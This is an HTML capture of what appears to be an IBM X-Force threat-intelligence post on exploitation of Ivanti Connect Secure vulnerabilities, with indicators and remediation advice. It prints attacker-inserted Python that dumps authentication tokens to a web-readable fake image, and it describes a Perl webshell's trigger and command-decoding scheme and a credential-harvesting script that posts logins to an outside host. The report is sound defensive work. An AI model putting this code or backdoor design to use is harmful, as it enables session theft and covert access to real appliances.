vulnerabilities","isPartOf":{"@id":"https://securityintelligence.com/#website"},"inLanguage":"en-US","primaryImageOfPage":{"@id":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/#primaryimage"},"datePublished":"2024-02-23T18:27:00+00:00","dateModified":"2024-03-06T18:52:47+00:00","description":"Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions."}]}</script> <!-- / Yoast SEO Premium plugin. 
id="scrollToTopButton" on="tap:top-viewer.scrollTo(duration=200, position=bottom)" class="tap_target "> <div class="scroll-to-top__button"> <amp-img width="12" height="16" layout="fixed" alt="Back-to-top" src="https://securityintelligence.com/wp-content/themes/sapphire/images/scroll-to-top.svg"></amp-img> </div> </button> </div> <!-- SCROLL SHOW/HIDE ANIMATION --> <amp-animation id="showAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "1", "visibility": "visible" }] }] } </script> </amp-animation> <amp-animation id="hideAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "0", "visibility": "hidden" }] }] } </script> </amp-animation> </div> <!-- CHECK PAGE POSITION --> <amp-position-observer target="top-viewer" intersection-ratios="0" on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer> <!-- SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "http://schema.org", "@type": "Article", "headline": "Widespread exploitation of recently disclosed Ivanti vulnerabilities", "mainEntityOfPage": "https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/", "author": { "@type": "Person", "name": "Richard Emerson" }, "datePublished": "2024-02-23T13:27:00-05:00", "dateModified": "2024-03-06T13:52:47-05:00", "publisher": { "@type": "Organization", "name": "Security Intelligence", "logo":{ "@type": "ImageObject", "url": "https://securityintelligence.com/wp-content/themes/security-intelligence/assets/img/logo.png" } }, "image": [ "https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg" ], "articleBody": "IBM X-Force has 
assisted several organizations in responding to successful compromises involving the Ivanti appliance vulnerabilities disclosed in January 2024. Analysis of these incidents has identified several Ivanti file modifications that align with current public reporting. Additionally, IBM researchers have observed specific attack techniques involving the theft of authentication token data not readily noted in current public sources. The blog details the results of this research to assist organizations in protecting against these threats. <h2>Key Findings</h2> <ul type="disc"> <li>IBM research teams have directly observed the DSLog backdoor <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf">reported </a>in active real-world cyber attacks</li> <li>X-Force also identified modifications to the Ivanti "auth_token.py" file to dump authentication token data to another file, presumably for exfiltration–this observation is distinct from other vendors</li> <li>Organizations can leverage several potential data sources when investigating potential Ivanti appliance compromises.</li> </ul> <h2>Overview</h2> IBM X-Force has been monitoring the evolving campaigns leveraging recently disclosed Ivanti zero days. Initial disclosure by Ivanti was published on January 10th, 2024 and detailed CVE-2023-46805 and CVE-2024-21887 impacting Ivanti Connect Secure and Policy Secure appliances. CVE-2023-46805 pertains to an authentication bypass vulnerability permitting a remote attacker to access restricted resources. The other vulnerability, CVE-2024-21887, is a remote code execution/injection (RCE) vulnerability permitting an authenticated administrator to execute arbitrary commands by sending specially crafted packets. 
Public <a href="https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day">reporting</a> indicates a threat actor exploited these vulnerabilities against select targets as early as December 2023. Multiple vendors have attributed the initial intrusions to a suspected Chinese threat actor tracked as UTA0178 (aka UNC5221). X-Force is currently unable to corroborate this reporting with sufficient confidence to comment. On January 11th and 12th, following the publication of these vulnerabilities, <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/">multiple</a> <a href="https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/">vendors</a> observed mass scanning and exploitation attempts against various organizations. While UTA0178 was reportedly behind some of this increase in activity, similarities in deployed webshells and non-public methodologies have been reported as evidence that these exploits may have been shared with related <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/">actors</a>. This proliferation of zero-day exploits similar to the initial campaign(s) has been observed in widespread use to opportunistically gain footholds in thousands of organizations before or soon after patches were available. This pattern of activity is consistent with prior campaigns also attributed to suspected Chinese threat <a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/">actors</a>. Starting January 16th, proof of concept (POC) exploit code was released for CVE-2023-46805 and CVE-2024-21887. Ivanti disclosed additional vulnerabilities CVE-2024-21893 and CVE-2024-21888 on January 31st for Ivanti Connect Secure, Policy Secure, and ZTA Gateways, with POC exploit code released on February 2nd. 
CVE-2024-21893 is an SSRF (Server-Side Request Forgery) vulnerability that may permit access to restricted resources without authentication. CVE-2024-21888 is a privilege escalation vulnerability. As of February 8th, Ivanti had identified an additional vulnerability, CVE-2024-22024, which is an XXE vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways that allows an attacker to access certain restricted resources with authentication. <img src="https://images1.cmp.optimizely.com/Zz03ZjVkMmQ3Y2NjNDQxMWVlYmM3MGNhZmQxMGFkODg1Yw==" alt="Major events timeline of Ivanti vulnerabilities" width="720" height="125.23512747875354"><i>(Major Events Timeline of Ivanti Vulnerabilities)</i> <h3>Authentication Token Dumper</h3> X-Force identified threat actor modifications to the file auth_token.py to include code designed to dump authentication token data. This file is part of the Python package cav-0.1-py3.6.egg, and is found at the path: <b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/auth_token.py</b>. The CAV Python package was also targeted by the FRAMESTING, WIREFIRE, and CHAINLINE webshells <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation">observed by Mandiant</a>; however, none of those were reported to target authentication tokens. Our malware analysis team has independently confirmed these particular webshells are being used in combination with the vulnerabilities included in this report. 
The following code was inserted into auth_token.py: <pre><code>from datetime import datetime
ctime = datetime.now()
ftime = ctime.strftime("%Y-%m-%d %H:%M:%S")
data_save = {"time":ftime,"token_hash":token_hash,"dsid": dsid, "roles": roles, "role_ids": role_ids,"user_name": user_name}
with open("/home/webserver/htdocs/dana-na/auth/qrcod.gif","a") as f:
    f.write(f"{data_save}\n")</code></pre> This code is designed to write information about the generated authentication token to the file <b>/home/webserver/htdocs/dana-na/auth/qrcod.gif</b>. The file used (auth_token.py), functionality of the inserted code, and exfiltration path identified by our researchers differ from those reported by other vendors. This may indicate differing tool sets or basic attempts at defense evasion by modifying easily identifiable features used in previous attacks. 
<h3>DSLog Backdoor</h3> X-Force also identified malicious code for a Perl-based webshell inserted into the legitimate Ivanti file <b>/home/perl/DSLog.pm</b> within a function named <b>Msg</b>, which has been named "DSLog Backdoor" by another <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf">vendor</a>. A snippet of that function can be seen below, and the lines referencing "webshell code" were inserted for clarity. <p data-pm-slice='1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]'><img src="https://images3.cmp.optimizely.com/Zz1jNWEzODZkZWQyNzgxMWVlYmZiMzY2Y2RiMWY0MTRmMg==" alt="Code snippet of the modified Msg function in DSLog.pm, with the inserted webshell code marked" width="546" height="575.5339805825244"></p> When run, the webshell code retrieves the HTTP request string and user agent from environment variables. It then checks the user agent for the string '<b>3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6</b>'. As noted in <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf">OSINT</a>, X-Force has also observed a SHA256 hash used as a string. If this string is present within the user-agent, the webshell processes the request string, which it expects to be formatted as: <b>&amp;cdi=&lt;hex_formatted_string&gt;</b>. These indicators have also not been identified in previous public reporting. The webshell decodes the hex string to ASCII and performs a further ROT-47 decoding operation. It then executes the resulting string using the 'system' command. In addition to the activity described above, we also observed malicious files that correspond with those described in existing reporting. 
These include the following: <ul type="disc"> <li><b>/home/webserver/htdocs/dana-na/auth/lastauthserverused.js - </b>We identified credential harvesting code inserted into this legitimate file, which was similar to that observed by Mandiant (as WARPWIRE) and <a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/">Volexity</a>. The Login function within the <b>lastauthserverused.js</b> file has been modified to forward login credentials as an HTTP POST request to the URL <b>http[:]//www.ehangmun[.]com/board/selectbox/xml.php</b>.</li> <li><b>/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg/scanner/scripts/scanner.py</b> - This is a legitimate file and part of the Integrity Checker Tool. The <b>dumpStats</b> function within the file has been modified to always report zero detected changes. Volexity also observed this behavior.</li> <li><b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/visits.py</b> - This is a legitimate file to which webshell code has been added, and is called when the URI /api/v1/cav/client/visits is accessed. This matches the GIFTEDVISITOR webshell reported on by Volexity.</li> </ul> <h3>Ivanti Appliance Investigation Considerations</h3> With regard to Ivanti appliances, after appropriate containment actions have been taken, X-Force recommends organizations leverage the external Ivanti Integrity Check Tool (ICT) to identify potential evidence of compromise. The Ivanti ICT is a utility that is designed to check “the integrity of the complete file system and finds any additional/modified file(s)” for ICS and IPS images installed on virtual or hardware appliances, and has been the fastest way to obtain evidence in X-Force's experience. 
As noted above and by <a href="https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/">others</a>, threat actors have modified the built-in ICT to hide evidence of changes on Ivanti appliances, so running the external ICT is recommended. The output of that scan comes in the form of a TGZ file that is contained inside an encrypted "format" with a hardcoded key. While X-Force recommends working with Ivanti to decrypt the output, there is code available on <a href="https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605">GitHub </a>that can assist with decrypting these files, should the need arise. Analysis work should involve investigating the TGZ file directly to ensure all relevant information of interest, particularly time stamps, is properly collected. In addition to the Ivanti ICT tool output, organizations can also capture disk/memory images, as well as collect and review the User Access Log, Event Log, and Administrator Access Log files from the Admin Console. Preservation of evidence can be critical in ensuring the complete eviction of malicious actors. When possible, X-Force recommends organizations collect forensic images before remediation actions are taken, including resetting the appliance. Mitigation efforts may alert threat actors to detection and once the appliance is rebuilt, important evidence is lost. This may include critical data necessary to determine what actions the threat actor may have taken if the device was compromised. Ivanti support may also be required to decrypt these images for analysis. <h2>Conclusion</h2> Remote access solutions continue to remain an attractive target for threat actors looking to gain a foothold in target environments. 
For the most recent Ivanti appliance zero-days, X-Force has observed threat actors leveraging file modifications to steal authentication token data as well as deploying the DSLog webshell to conduct post-compromise activity (particularly for maintaining persistence, lateral movement, and data exfiltration). X-Force recommends organizations responding to an Ivanti compromise follow the remediation guidance provided by the vendor, while also taking into account forensic collection requirements. <h2>Recommendations</h2> <ul type="disc"> <li>Follow the recommendations noted in the Ivanti Appliance Investigation Considerations section</li> <li>Ensure a backup of the configuration is saved for the appliance before initiating a factory reset</li> <li>Apply official patches from Ivanti to vulnerable appliances</li> <li>Consider revoking and reissuing appliance-related secrets, API keys, and certificates</li> <li>Consider rotating passwords for users that authenticated to the appliance during the timeframe of compromise</li> <li>Forward Ivanti appliance logs to a centralized location to prevent log tampering, particularly the User and Admin Access Logs, and the Events Logs</li> <li>Investigate implementing and/or leveraging a configuration management solution.</li> </ul> An advance copy of this analysis was provided to X-Force Premier Threat Intelligence (PTI) subscription clients on February 7, 2024. To learn how you can gain advanced insight into X-Force Threat Intelligence products, try a <a href="https://www.ibm.com/products/xforce-exchange/editions">30-day free trial</a> of PTI on <a href="https://exchange.xforce.ibmcloud.com/">X-Force Exchange</a>. 
<p data-pm-slice="1 1 []"><em>To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence, or offensive security services </em><a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-52262" target="_blank" rel="noopener noreferrer nofollow" data-attrib-id="link-49156072-c91c-4860-82c5-1f321e510076"><em>schedule a meeting here</em></a><em>.</em></p> <em>If you are experiencing cybersecurity issues or an incident, contact </em><a href="https://www.ibm.com/x-force" target="_blank" rel="noopener noreferrer nofollow" data-attrib-id="link-1309f73b-683d-491b-a590-c97dc5cc1248"><em>X-Force</em></a><em> to help: US hotline </em><em>1-888-241-9812</em><em> | Global hotline (+001) </em><em>312-212-8034</em><em>.</em> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 157.95pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p 
style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">336d22d5a85319bf9e2567b3964fdc5a</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified lastauthserverused.js file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">79a1ff16095c2df1356ee9b2d5aeb8b9</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified scanner.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 
107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">094433737d3ff87776c4abae6c91aaaf</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified visits.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">6806d0735c49bd7351dda964e84e2c01</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified auth_token.py file to dump authentication token data</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; 
font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">ae487dcf9219bab971bdc9d6a4ac7022</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">DSLog Backdoor</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">139.162.152.19</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">122.167.210.185</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid 
#DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">194.233.171.172</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.243</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: 
Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.244</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.233</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid 
#DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> </tbody> </table>" } </script> <!-- BREADCRUMB SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "https://schema.org", "@type": "BreadcrumbList", "itemListElement": [ { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://securityintelligence.com/" }, ] } </script> <div id="progressbar"> <amp-animation id="progress-animation" layout="nodisplay"> <script type="application/json"> { "duration": "1s", "iterations": "1", "fill": "both", "direction": "alternate", "animations": [{ "selector": "#progressbar", "keyframes": [{ "transform": "translateX(0)" }] }] } </script> </amp-animation> </div> <amp-position-observer target="post__content" intersection-ratios="0" viewport-margins="25vh 75vh" on="scroll:progress-animation.seekTo(percent=event.percent)" layout="nodisplay"></amp-position-observer> <div class="dark_background" style="background:black;"></div> <div class="container grid" style="background:black;"> <!-- Breadcrumbs --> <aside class="breadcrumbs "> <h1 class="breadcrumbs__page_title">Widespread exploitation of recently disclosed Ivanti vulnerabilities</h1> </aside> </div> <div class="container grid hero_background "> <div class="grid__content post "> <div class="post__thumbnail"> <amp-img alt="Closeup on a blue circuit board with an orange padlock in the center" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg.webp" srcset="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4-300x158.jpeg.webp 300w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg.webp 
630w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4.jpeg.webp 1200w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/02/Lock-sign-4.jpeg.webp 2400w"> <amp-img fallback alt="Closeup on a blue circuit board with an orange padlock in the center" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg" srcset="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-300x158.jpeg 300w, https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg 630w, https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg 1200w, https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg 2400w"> </amp-img> </amp-img> </div> <div class="new_categoy"> <div class="category-container"> <div class="category"> <div class="theme"> <div class="form-check form-switch"> <div class="link-container"> <a href="#" class="theme-link" id="light-theme-link">Light</a> <a href="#" class="theme-link" id="dark-theme-link">Dark</a> </div> </div> </div> <hr class="separator"> <div class="author_date"> <div class="information"> <span class="date">February 23, 2024</span> <span class="author_category">By <a href="https://securityintelligence.com/author/richard-emerson/" >Richard Emerson</a> <span class="author_comma"></span><br> <!--== Co-Authors ==--> <!-- <br /> --> <a href="https://securityintelligence.com/author/kevin-snider/">Kevin Snider</a> <span class="author_comma"></span><br> <a href="https://securityintelligence.com/author/charlotte-hammond/">Charlotte Hammond</a> <span class="author_comma"></span><br> <a href="https://securityintelligence.com/author/ruben-castillo/">Ruben Castillo</a> <br> </span> <span class="author_category"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">min 
read</span></span></span> </div> </div> <hr class="separator"> <div class="title"> <a href="https://securityintelligence.com/category/x-force/threat-intelligence/"><span class="name_category">Threat Intelligence<br> </span></a> </div> <div class="social-container" style="visibility: hidden;"> <hr class="separator"> <div class="social"> <!-- Social ICONS --> <a href="https://twitter.com/intent/tweet?text=Widespread exploitation of recently disclosed Ivanti vulnerabilities&url=https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/twitter.svg" alt="twitter"></amp-img></a> <a href="https://www.linkedin.com/shareArticle?url=https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/linkedin.svg" alt="Linkedin" ></amp-img></a> <a href="https://www.facebook.com/sharer/sharer.php?u=https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/facebook.svg" alt="facebook"></amp-img></a> <a href="https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/link.svg" alt="An arrow pointing up"></amp-img></a> </div> </div> </div> <script> window.addEventListener('scroll', function() { var category = 
